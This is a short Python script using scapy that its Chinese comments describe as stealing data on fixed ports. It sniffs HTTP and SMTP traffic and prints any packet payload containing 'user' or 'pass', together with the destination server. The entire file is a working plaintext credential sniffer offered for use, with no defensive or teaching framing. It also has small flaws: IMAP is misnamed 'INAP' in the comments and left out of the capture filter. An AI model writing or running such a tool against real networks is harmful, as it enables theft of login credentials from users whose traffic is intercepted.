#coding:utf-8 

from scapy.all import *
#窃取固定端口的数据 80 HTTP 25 SMTP 143 INAP
#p[IP].dst: 获取IP地址


def c(p):
	if p[TCP].payload:
		mp = str(p[TCP].payload)#p[TCP].payload  获取TCP的原始数据 如果用p.show()的话，数据看不明白
		if "user" in mp.lower() or "pass" in mp.lower():
			print "[*] p[TCP].payload: ",mp
			print "[*] Connect server: %s" % p[IP].dst
	#p.show()
	#p[TCP].payload
if __name__ == '__main__':
	sniff(filter="tcp port 80 or tcp port 25", prn=c, count=1)

#80 HTTP 25 SMTP 143 INAP
